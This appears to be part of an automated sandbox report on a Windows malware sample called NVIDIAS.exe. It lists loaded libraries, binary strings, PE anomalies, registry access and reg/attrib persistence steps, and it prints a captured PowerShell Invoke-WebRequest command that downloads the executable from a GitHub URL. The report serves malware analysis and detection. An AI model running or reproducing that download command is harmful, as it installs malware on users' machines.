    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: profapi.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: amsi.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: userenv.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: rasman.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: edputil.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: propsys.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: netutils.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: slc.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: sppc.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
    Source: C:\ProgramData\QQQ\NVIDIAS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: Binary string: ntkrnlmp.pdbxC4 source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: WINLOA~1.PDBwinload_prod.pdbtmpx87^ source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Windows.Forms.ni.pdb source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: WINLOA~1.PDBwinload_prod.pdbndows PowerShell.lnk source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Drawing.ni.pdb source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Configuration.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Net.Http.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Security.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: ntkrnlmp.pdbmb;~f source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.IO.Compression.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Configuration.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Drawing.ni.pdbRSDS source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: winload_prod.pdb source: NVIDIAS.exe, 00000015.00000002.1218454425.00000000069E9000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: System.Xml.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Core.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Windows.Forms.pdb source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Drawing.pdb/ source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: mscorlib.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\tdataac4 source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Net.Http.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Drawing.pdb source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Management.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdatata source: NVIDIAS.exe, 00000015.00000002.1216769501.0000000005D04000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*ws\* source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Net.Http.pdbH source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Core.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\** source: NVIDIAS.exe, 00000015.00000002.1216769501.0000000005D04000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Security.pdb24 source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: mscorlib.ni.pdbRSDS] source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata*a source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\*ae source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: mscorlib.pdbH source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.ni.pdb source: WER6A29.tmp.dmp.39.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"Jump to behavior
    Source: NVIDIAS.exe.20.drStatic PE information: 0x96EB7DA4 [Sun Mar 27 17:38:44 2050 UTC]
    Source: initial sampleStatic PE information: section where entry point is pointing to: .>h"
    Source: NVIDIAS.exe.20.drStatic PE information: section name: .4Ul
    Source: NVIDIAS.exe.20.drStatic PE information: section name: .+,2
    Source: NVIDIAS.exe.20.drStatic PE information: section name: .>h"
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_03530220 push eax; ret 21_2_0353022D
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_035305E0 pushad ; ret 21_2_035305ED
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_055A1777 push eax; mov dword ptr [esp], ecx21_2_055A179C
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731B309 pushad ; iretd 21_2_0731B325
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_0731BBF8 push esp; ret 21_2_0731BC05
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_07316970 push eax; iretd 21_2_07316971
    Source: C:\ProgramData\QQQ\NVIDIAS.exeCode function: 21_2_08301CD3 push esp; retf 21_2_08301CD4
    Source: NVIDIAS.exe.20.drStatic PE information: section name: .>h" entropy: 7.724583620670912

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QQQ\NVIDIAS.exeJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QQQ\NVIDIAS.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 1490
    Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49710
